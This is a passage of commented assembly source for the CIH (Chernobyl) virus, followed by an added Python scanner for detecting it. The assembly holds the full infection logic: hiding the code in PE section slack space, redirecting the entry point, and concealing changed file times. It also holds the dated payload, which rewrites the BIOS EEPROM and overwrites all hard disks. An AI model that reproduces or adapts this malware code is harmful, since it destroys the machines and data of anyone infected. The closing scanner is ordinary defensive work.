; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; ***************************
        inc ecx
        push ecx                ; Save NumberOfSections+1
        shl ecx, 03h            ; *8: each virus code section table entry is 8 bytes
        push ecx                ; Save TotalSizeOfVirusCodeSectionTable
        add ecx, eax
        add ecx, edx            ; ecx = end of section table + reserved virus table
        sub ecx, (SizeOfHeaders-@9)[esi]
        not ecx
        inc ecx                 ; two's complement: ecx = SizeOfHeaders - that = unused header space after the tables
        ; Save My Virus First Section Code
        ; Size of Following Section Table...
        ; ( Not Include the Size of Virus Code Section Table )
        push ecx
        xchg ecx, eax           ; ECX = Size of Section Table
        ; Save Original Address of Entry Point
        mov eax, (AddressOfEntryPoint-@9)[esi] ; entry point RVA
        add eax, (ImageBase-@9)[esi] ; + image base
        mov (OriginalAddressOfEntryPoint-@9)[esi], eax ; the host's virtual entry address, patched into the ret stub
        cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection ; unused space vs. size of the virus' first chunk
        jl OnlySetInfectedMark  ; too small: only set the infected mark
; ***************************
; * Read All Section Tables *
; ***************************
        mov eax, ebp            ; read function number
        call edi                ; VXDCall IFSMgr_Ring0_FileIO ; section table into [esi] (@9)

; ***************************
; * Full Modify the Bug : *
; * WinZip Self-Extractor *
; * Occurs Error... *
; ***************************
; * So When User Opens *
; * WinZip Self-Extractor, *
; * Virus Doesn't Infect it.*
; ***************************
; * First, Virus Gets the *
; * PointerToRawData in the *
; * Second Section Table, *
; * Reads the Section Data, *
; * and Tests the String of *
; * 'WinZip(R)'...... *
; ***************************
        xchg eax, ebp           ; eax = read function number, ebp = bytes read (the section table size)
        push 00000004h
        pop ecx                 ; read 4 bytes
        push edx
        mov edx, (SizeOfScetionTable+PointerToRawData-@9)[ebx] ; PointerToRawData of the second section (.rdata)
        add edx, 12h            ; + 10h + 2h: the "WinZip(R)" string sits at offset 10h of that section
        call edi                ; VXDCall IFSMgr_Ring0_FileIO ; 4 bytes into [esi]
        ; cmp [esi], 'nZip'
        cmp dword ptr [esi], 'piZn' ; WinZip self-extractor?
        je NotSetInfectedMark   ; yes: leave it completely alone, not even a mark
        pop edx                 ; edx = file offset of the section table

; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; ***************************
        ; EBX = My Virus First Section Code
        ; Size of Following Section Table
        pop ebx                 ; ebx = unused header space after the tables
        pop edi                 ; EDI = TotalSizeOfVirusCodeSectionTable
        pop ecx                 ; ECX = NumberOfSections+1
        push edi                ; Size
        add edx, ebp            ; ebp = section table size
        push edx                ; Pointer of File ; just past the section table in the file
        add ebp, esi            ; ebp -> just past the section table image in the data area
        push ebp                ; Address of Buffer

; ***************************
; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; ***************************
        lea eax, [ebp+edi-04h]
        mov [eax], ebx          ; last table entry: size of the virus' first chunk (= unused header space)

; ***************************
; * Let's Set My Virus *
; * First Section Code *
; ***************************
        push ebx                ; Size ; first chunk size
        add edx, edi
        push edx                ; Pointer of File ; past the section table and the virus table: where the body starts
        lea edi, (MyVirusStart-@9)[esi]
        push edi                ; Address of Buffer ; -> start of the virus body

; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; ***************************
        mov (NewAddressOfEntryPoint-@9)[esi], edx ; inside the headers file offset equals RVA, so this
                                ; file offset is also the new AddressOfEntryPoint

; ***************************
; * Setup Initial Data *
; ***************************
        lea edx, [esi-SizeOfScetionTable] ; one entry before the table, so the add at note 1 lands on entry 0
        mov ebp, offset VirusSize ; ebp = bytes of virus body still to place
        jmp StartToWriteCodeToSections

; ***************************
; * Write Code to Sections *
; ***************************
LoopOfWriteCodeToSections:
        add edx, SizeOfScetionTable ; note 1: next section table entry
        mov ebx, (SizeOfRawData-@9)[edx] ; ebx = this section's SizeOfRawData
        sub ebx, (VirtualSize-@9)[edx] ; - VirtualSize = unused (slack) bytes of the section in the file
        jbe EndOfWriteCodeToSections ; no slack: skip the section
        push ebx                ; Size
        sub eax, 08h
        mov [eax], ebx          ; chunk size into the virus code section table
        mov ebx, (PointerToRawData-@9)[edx] ; the section's file offset
        add ebx, (VirtualSize-@9)[edx] ; + VirtualSize
        push ebx                ; Pointer of File ; file offset of the slack
        push edi                ; Address of Buffer
        mov ebx, (VirtualSize-@9)[edx]
        add ebx, (VirtualAddress-@9)[edx]
        add ebx, (ImageBase-@9)[esi] ; virtual address of the slack once the image is loaded
        mov [eax+4], ebx        ; chunk address into the virus code section table
        mov ebx, [eax]          ; chunk size (the slack)
        add (VirtualSize-@9)[edx], ebx ; grow VirtualSize so the loader maps the slack
        ; Section contains initialized data ==> 00000040h
        ; Section can be Read. ==> 40000000h
        or (Characteristics-@9)[edx], 40000040h ; section readable and flagged as initialized data
StartToWriteCodeToSections:
        sub ebp, ebx            ; remaining body - chunk size
        jbe SetVirusCodeSectionTableEndMark ; everything placed: terminate the virus table
        add edi, ebx            ; Move Address of Buffer ; next part of the body
EndOfWriteCodeToSections:
        loop LoopOfWriteCodeToSections
; ***************************
; * Only Set Infected Mark *
; ***************************
OnlySetInfectedMark:
        mov esp, dr1            ; drop every pending write except the infected mark
        jmp WriteVirusCodeToFile

; ***************************
; * Not Set Infected Mark *
; ***************************
NotSetInfectedMark:
        add esp, 3ch            ; drop everything pushed for this file; nothing is written
        jmp CloseFile

; ***************************
; * Set Virus Code *
; * Section Table End Mark *
; ***************************
SetVirusCodeSectionTableEndMark:
        ; Adjust Size of Virus Section Code to Correct Value
        add [eax], ebp          ; ebp <= 0 here: trim the last chunk to what is actually left
        add [esp+08h], ebp      ; and the matching pending write size
        ; Set End Mark
        xor ebx, ebx
        mov [eax-04h], ebx      ; zero-terminate the virus code section table

; ***************************
; * When VirusGame Calls *
; * VxDCall, VMM Modifies *
; * the 'int 20h' and the *
; * 'Service Identifier' *
; * to 'Call [XXXXXXXX]'. *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First. ^__^ *
; ***************************
        lea eax, (LastVxDCallAddress-2-@9)[esi] ; address of the last VxD call site in the body
        mov cl, VxDCallTableSize ; number of VxD call sites
LoopOfRestoreVxDCallID:
        mov word ptr [eax], 20cdh ; "int 20h" opcode back in place
        mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] ; service id of this call site, from VxDCallIDTable
        mov [eax+2], edx        ; written after the int 20h: the original 'int 20h' + 'Service Identifier' form
        movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] ; VxDCallAddressTable holds the distance to the previous call site
        sub eax, edx            ; step back to it
        loop LoopOfRestoreVxDCallID

; ***************************
; * Let's Write *
; * Virus Code to the File *
; ***************************
WriteVirusCodeToFile:
        mov eax, dr1            ; the esp saved above
        mov ebx, [eax+10h]      ; file handle saved on the stack
        mov edi, [eax]          ; IFSMgr_Ring0_FileIO address saved on the stack
LoopOfWriteVirusCodeToFile:
        pop ecx                 ; buffer address of the next pending write
        jecxz SetFileModificationMark ; the 0 end mark terminates the list
        mov esi, ecx
        mov eax, 0d601h         ; IFSMgr_Ring0_FileIO function: write file (R0_WRITEFILE)
        pop edx                 ; file offset
        pop ecx                 ; byte count
        call edi                ; VXDCall IFSMgr_Ring0_FileIO ; in order: virus body chunks, the virus code section
                                ; table, the modified section table, the new entry point, finally the infected mark
        jmp LoopOfWriteVirusCodeToFile

; ***************************
; * Let's Set CF = 1 ==> *
; * Need to Restore File *
; * Modification Time *
; ***************************
SetFileModificationMark:
        pop ebx                 ; file handle
        pop eax                 ; the flags pushed at "Open File Already Succeed" (CF = 0)
        stc                     ; Enable CF(Carry Flag) ; CF = 1: the file was modified
        pushf

; *************************************
; * Close File *
; *************************************
CloseFile:
        xor eax, eax
        mov ah, 0d7h            ; IFSMgr_Ring0_FileIO function: close file
        call edi                ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Need to Restore File Modification *
; * Time !? *
; *************************************
        popf
        pop esi
        jnc IsKillComputer      ; CF = 0 (nothing written): check the payload trigger instead :-(

; *************************************
; * Restore File Modification Time *
; *************************************
        mov ebx, edi
        mov ax, 4303h           ; IFSMgr_Ring0_FileIO function: set file date and time
        mov ecx, (FileModificationTime-@7)[esi]
        mov edi, (FileModificationTime+2-@7)[esi]
        call ebx                ; VXDCall IFSMgr_Ring0_FileIO ; original modification time back, so the change is not visible

; *************************************
; * Disable OnBusy *
; *************************************
DisableOnBusy:
        dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy

; *************************************
; * Call Previous FileSystemApiHook *
; *************************************
prevhook:
        popad                   ; restore all registers
        mov eax, dr0            ; address of the previous file system hook
        jmp [eax]               ; Jump to prevhook

; *************************************
; * Call the Function that the IFS *
; * Manager Would Normally Call to *
; * Implement this Particular I/O *
; * Request. *
; *************************************
pIFSFunc:                       ; reached when OnBusy is set, i.e. for the virus' own open of the victim;
                                ; arguments of FileSystemApiHookFunction are described at note 2
        mov ebx, esp            ; ebx -> saved registers; the hook's arguments lie above them
        push dword ptr [ebx+20h+04h+14h] ; Push pioreq ; ebx+20h+04h is the first argument (FSDFnAddr)
        call [ebx+20h+04h]      ; Call pIFSFunc ; the FSD function the IFS manager would have called
        pop ecx                 ; ecx = pioreq
        mov [ebx+1ch], eax      ; Modify EAX Value in Stack ; pushad stored eax first (+1ch), so popad returns the FSD's result

; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the *
; * Returned pioreq. *
; ***************************
        cmp dword ptr [ebx+20h+04h+04h], 00000024h ; FunctionNum == IFSFN_OPEN? (note 2)
        jne QuitMyVirusFileSystemHook

; *****************
; * Get the File *
; * Modification *
; * Date and Time *
; * in DOS Format.*
; *****************
        mov eax, [ecx+28h]
        mov (FileModificationTime-@6)[esi], eax ; the victim's date and time, restored after infection

; ***************************
; * Quit My Virus' *
; * IFSMgr_FileSystemHook *
; ***************************
QuitMyVirusFileSystemHook:
        popad                   ; restore all registers
        ret                     ; return from the virus' file system hook

; *************************************
; * Kill Computer !? ... *^_^* *
; *************************************
; (annotator: the KillComputer module is extremely dangerous, so the analysis of how it works
; and the detailed comments are withheld for now)
IsKillComputer:
        ; Get Now Day from BIOS CMOS
        mov al, 07h             ; CMOS register 07h: day of month, BCD
        out 70h, al             ; 70h/71h are the CMOS index/data ports
        in al, 71h
        xor al, 26h             ; ??/26/???? ; ZF = 1 only on the 26th
IF DEBUG
        jmp DisableOnBusy       ; the debug build never runs the payload
ELSE
        jnz DisableOnBusy
ENDIF
        ; on the 26th of any month execution falls through into the payload

; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; **************************************
; ***************************
; * Kill BIOS EEPROM *
; ***************************
        mov     bp, 0cf8h
        lea     esi, IOForEEPROM-@7[esi]
; ***********************
; * Show BIOS Page in *
; * 000E0000 - 000EFFFF *
; * ( 64 KB ) *
; ***********************
        mov     edi, 8000384ch
        mov     dx, 0cfeh
        cli
        call    esi
; ***********************
; * Show BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
        mov     di, 0058h
        dec     edx
        ; and a0fh
        mov     word ptr (BooleanCalculateCode-@10)[esi], 0f24h
        call    esi
; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; * be Writted... *
; ***********************
        lea     ebx, EnableEEPROMToWrite-@10[esi]
        mov     eax, 0e5555h
        mov     ecx, 0e2aaah
        call    ebx
        mov     byte ptr [eax], 60h
        push    ecx
        loop    $
; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E007F *
; * ( 80h Bytes ) *
; ***********************
        xor     ah, ah
        mov     [eax], al
        xchg    ecx, eax
        loop    $
; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) *
; * can be Writted... *
; ***********************
        mov     eax, 0f5555h
        pop     ecx
        mov     ch, 0aah
        call    ebx
        mov     byte ptr [eax], 20h
        loop    $
; ***********************
; * Kill the BIOS Main *
; * ROM Data in Memory *
; * 000FE000 - 000FE07F *
; * ( 80h Bytes ) *
; ***********************
        mov     ah, 0e0h
        mov     [eax], al
; ***********************
; * Hide BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
        ; or al 0h
        mov     word ptr (BooleanCalculateCode-@10)[esi], 100ch
        call    esi
; ***************************
; * Kill All HardDisk *
; ***************************************************
; * IOR Structure of IOS_SendCommand Needs *
; ***************************************************
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ***************************************************
KillHardDisk:
        xor     ebx, ebx
        mov     bh, FirstKillHardDiskNumber
        push    ebx
        sub     esp, 2ch
        push    0c0001000h
        mov     bh, 08h
        push    ebx
        push    ecx
        push    ecx
        push    ecx
        push    40000501h
        inc     ecx
        push    ecx
        push    ecx
        mov     esi, esp
        sub     esp, 0ach
LoopOfKillHardDisk:
        int     20h
        dd      00100004h               ; VXDCall IOS_SendCommand
        cmp     word ptr [esi+06h], 0017h
        je      KillNextDataSection
ChangeNextHardDisk:
        inc     byte ptr [esi+4dh]
        jmp     LoopOfKillHardDisk
KillNextDataSection:
        add     dword ptr [esi+10h], ebx
        mov     byte ptr [esi+4dh], FirstKillHardDiskNumber
        jmp     LoopOfKillHardDisk
; ***************************
; * Enable EEPROM to Write *
; ***************************
EnableEEPROMToWrite:
        mov     [eax], cl
        mov     [ecx], al
        mov     byte ptr [eax], 80h
        mov     [eax], cl
        mov     [ecx], al
        ret
; ***************************
; * IO for EEPROM *
; ***************************
IOForEEPROM:
@10 = IOForEEPROM
        xchg    eax, edi
        xchg    edx, ebp
        out     dx, eax
        xchg    eax, edi
        xchg    edx, ebp
        in      al, dx
BooleanCalculateCode = $
        or      al, 44h
        xchg    eax, edi
        xchg    edx, ebp
        out     dx, eax
        xchg    eax, edi
        xchg    edx, ebp
        out     dx, al
        ret
; *********************************************************
; * Static Data *
; *********************************************************
LastVxDCallAddress = IFSMgr_Ring0_FileIO        ; address of the last VxD call instruction
VxDCallAddressTable db 00h
        db      IFSMgr_RemoveFileSystemApiHook-_PageAllocate
        db      UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
        db      IFSMgr_Ring0_FileIO-UniToBCSPath        ; distances between successive VxD call instructions
VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h   ; VxD service numbers
VxDCallTableSize = ($-VxDCallIDTable)/04h       ; number of VxD calls the program uses
; *********************************************************
; * Virus Version Copyright *
; *********************************************************
VirusVersionCopyright db 'CIH v'        ; CIH virus marker
        db      MajorVirusVersion+'0'   ; major version number
        db      '.'
        db      MinorVirusVersion+'0'   ; minor version number
        db      ' TATUNG'               ; author name
; *********************************************************
; * Virus Size *
; *********************************************************
VirusSize = $
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)
                                        ; total length of the virus code
; *********************************************************
; * Dynamic Data *
; *********************************************************
VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress
OnBusy db 0                             ; busy flag
FileModificationTime dd ?               ; file modification time
FileNameBuffer db FileNameBufferSize dup(?)     ; file-name buffer, 7fh bytes long
@7 = FileNameBuffer
DataBuffer = $
@8 = DataBuffer
NumberOfSections dw ?                   ; number of sections
TimeDateStamp dd ?                      ; file time stamp
SymbolsPointer dd ?                     ;
NumberOfSymbols dd ?                    ; number of symbols in the symbol table
SizeOfOptionalHeader dw ?               ; size of the optional header
_Characteristics dw ?                   ; file characteristics flags
Magic dw ?                              ; magic word (always 010bh)
LinkerVersion dw ?                      ; linker version
SizeOfCode dd ?                         ; size of the code section
SizeOfInitializedData dd ?              ; size of initialized data
SizeOfUninitializedData dd ?            ; size of uninitialized data
AddressOfEntryPoint dd ?                ; RVA of the program entry point
BaseOfCode dd ?                         ; RVA where the code section starts
BaseOfData dd ?                         ; RVA where the data section starts
ImageBase dd ?                          ; image load base address
@9 = $
SectionAlignment dd ?                   ; section alignment
FileAlignment dd ?                      ; file alignment
OperatingSystemVersion dd ?             ; required operating system version
ImageVersion dd ?                       ; user-defined image version
SubsystemVersion dd ?                   ; required subsystem version
Reserved dd ?                           ; reserved
SizeOfImage dd ?                        ; total size of the image
SizeOfHeaders dd ?                      ; size of the headers plus the section table
SizeOfImageHeaderToRead = $-NumberOfSections ; ;
NewAddressOfEntryPoint = DataBuffer ; DWORD ;
SizeOfImageHeaderToWrite = 04h ;
StartOfSectionTable = @9
SectionName = StartOfSectionTable ; QWORD ; section name
VirtualSize = StartOfSectionTable+08h ; DWORD ; true size of the section
VirtualAddress = StartOfSectionTable+0ch ; DWORD ; RVA of the section
SizeOfRawData = StartOfSectionTable+10h ; DWORD ; physical size of the section
PointerToRawData = StartOfSectionTable+14h ; DWORD ; physical file offset of the section
PointerToRelocations = StartOfSectionTable+18h ; DWORD ; offset of the relocations
PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD ; offset of the line-number table
NumberOfRelocations = StartOfSectionTable+20h ; WORD ; number of relocations
NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD ; number of line-number entries
Characteristics = StartOfSectionTable+24h ; DWORD ; section attributes
SizeOfScetionTable = Characteristics+04h-SectionName ; size of one section-table entry
; *********************************************************
; * Virus Total Need Memory *
; *********************************************************
VirusNeedBaseMemory = $
VirusTotalNeedMemory = @9
; + NumberOfSections(??)*SizeOfScetionTable(28h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)
                                        ; memory the virus needs (its full length)
; *********************************************************
; *********************************************************
VirusGame ENDS
END FileHeader                          ; end of the virus source
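Seen from the defender's side, the PE header and section-table layout in the static data section above is also what a scanner needs. The following is an added example, not code from the listing or from the annotator: it reads those fields in the order the listing lays them out, then applies two checks tied to this family, the 'CIH v' version marker and an entry point that lands in a section's file padding (the RVA range between VirtualSize and SizeOfRawData, the well-known place this infector stores its code; a heuristic, not a complete detection). The names `parse_pe`, `scan` and `build_sample` are the example's own, and the sample image is constructed inline.

```python
import struct

# Added example (not from the listing): CIH-oriented PE header checks.
CIH_MARKER = b"CIH v"   # the version string the listing embeds
SECTION_ENTRY = 0x28    # SizeOfScetionTable in the listing


def parse_pe(data: bytes) -> dict:
    """Return NumberOfSections, AddressOfEntryPoint and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    # IMAGE_FILE_HEADER: Machine, then NumberOfSections (where DataBuffer starts)
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]   # SizeOfOptionalHeader
    opt = pe + 24
    entry = struct.unpack_from("<I", data, opt + 16)[0]     # AddressOfEntryPoint
    sections = []
    for i in range(nsec):
        name, vsize, vaddr, rawsize = struct.unpack_from(
            "<8sIII", data, opt + opt_size + i * SECTION_ENTRY)
        sections.append({"name": name.rstrip(b"\0"), "VirtualSize": vsize,
                         "VirtualAddress": vaddr, "SizeOfRawData": rawsize})
    return {"NumberOfSections": nsec, "AddressOfEntryPoint": entry,
            "sections": sections}


def scan(data: bytes) -> dict:
    """Marker string present? Entry point inside a section's file padding?"""
    hdr = parse_pe(data)
    ep = hdr["AddressOfEntryPoint"]
    in_padding = any(s["VirtualAddress"] + s["VirtualSize"] <= ep
                     < s["VirtualAddress"] + s["SizeOfRawData"]
                     for s in hdr["sections"])
    return {"marker": CIH_MARKER in data, "entry_in_padding": in_padding}


def build_sample(infected: bool) -> bytes:
    """Constructed minimal PE image: one .text section with 100h bytes of padding."""
    vsize, vaddr, rawsize, rawptr, opt_size = 0x100, 0x1000, 0x200, 0x200, 0xE0
    entry = vaddr + vsize + 0x10 if infected else vaddr      # into the padding, or not
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<HBBIIIIII", 0x10B, 5, 0, vsize, 0, 0, entry, vaddr, 0x2000)
    opt += struct.pack("<IIIIIIIII", 0x400000, 0x1000, 0x200, 4, 0, 4, 0, 0x3000, rawptr)
    sec = struct.pack("<8sIIIIIIHHI", b".text", vsize, vaddr, rawsize, rawptr,
                      0, 0, 0, 0, 0x60000020)
    hdr = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)
    hdr += b"PE\0\0" + coff + opt.ljust(opt_size, b"\0") + sec
    body = b"\x90" * vsize                                   # real code
    body += (b"\0" * 0x10 + CIH_MARKER if infected else b"").ljust(rawsize - vsize, b"\0")
    return hdr.ljust(rawptr, b"\0") + body
```

Run `scan(build_sample(True))` against `scan(build_sample(False))` to see both checks flip; on real files, treat either hit as a reason for a full scan rather than a verdict.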